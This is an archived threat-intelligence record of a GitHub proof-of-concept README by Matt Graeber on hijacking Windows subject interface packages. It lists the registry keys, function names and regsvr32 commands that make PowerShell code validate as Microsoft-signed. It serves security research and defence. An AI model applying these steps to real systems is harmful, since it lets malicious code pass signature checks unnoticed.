{
	"id": "a6a86cbb-7710-47a1-aeb8-6519f258916b",
	"created_at": "2026-04-06T00:19:09.232633Z",
	"updated_at": "2026-04-10T03:21:28.097332Z",
	"deleted_at": null,
	"sha1_hash": "89baabd6abcf30f1d8aa020d11fc8d90cf6318f3",
	"title": "GitHub - mattifestation/PoCSubjectInterfacePackage: A proof-of-concept subject interface package (SIP) used to demonstrate digital signature subversion attacks.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 45465,
	"plain_text": "GitHub - mattifestation/PoCSubjectInterfacePackage: A proof-of-concept subject interface package (SIP) used to demonstrate digital\r\nsignature subversion attacks.\r\nBy Matt Graeber\r\nArchived: 2026-04-05 20:24:34 UTC\r\nA PoC subject interface package (SIP) provider designed to educate about the required components of a SIP\r\nprovider.\r\nThis PoC is designed to serve as a basic SIP in addition to a payload for hijacking existing SIPs using the\r\nAutoApproveHash and GetLegitMSSignature functions. For example, if you wanted all PowerShell code to return\r\na valid MS cert regardless of whether they were signed by MS, you would redirect the following:\r\nDirect PowerShell SIP hijack (Native):\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\\r\n{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip.dll\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\\r\n{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - AutoApproveHash\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip.dll\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - GetLegitMSSignature\r\nPowerShell SIP hijack (WoW64):\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType\r\n0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) -\r\nC:\\path\\to\\MySip_x86.dll\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType\r\n0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) -\r\nAutoApproveHash\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType\r\n0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) -\r\nC:\\path\\to\\MySip_x86.dll\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType\r\n0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) -\r\nGetLegitMSSignature\r\nA normal installation of this SIP is performed as follows (from an elevated prompt):\r\nhttps://github.com/mattifestation/PoCSubjectInterfacePackage\r\nPage 1 of 2\n\nregsvr32 C:\\path\\to\\MySip.dll\r\nUpon installing this SIP via regsvr32, any file you create with the .foo, .bar, or .baz file extension will validate\r\nproperly with the embedded certificate.\r\nA normal uninstallation of this SIP is performed as follows (from an elevated prompt):\r\nregsvr32 /u C:\\path\\to\\MySip.dll\r\nNote: The included resource (MS_cert.bin) can be replaced with any Authenticode certificate (which includes any\r\nsigned .cat file) thus allowing you to be whomever you want.\r\nSource: https://github.com/mattifestation/PoCSubjectInterfacePackage\r\nhttps://github.com/mattifestation/PoCSubjectInterfacePackage\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/mattifestation/PoCSubjectInterfacePackage"
	],
	"report_names": [
		"PoCSubjectInterfacePackage"
	],
	"threat_actors": [],
	"ts_created_at": 1775434749,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.pdf",
		"text": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.txt",
		"img": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.jpg"
	}
}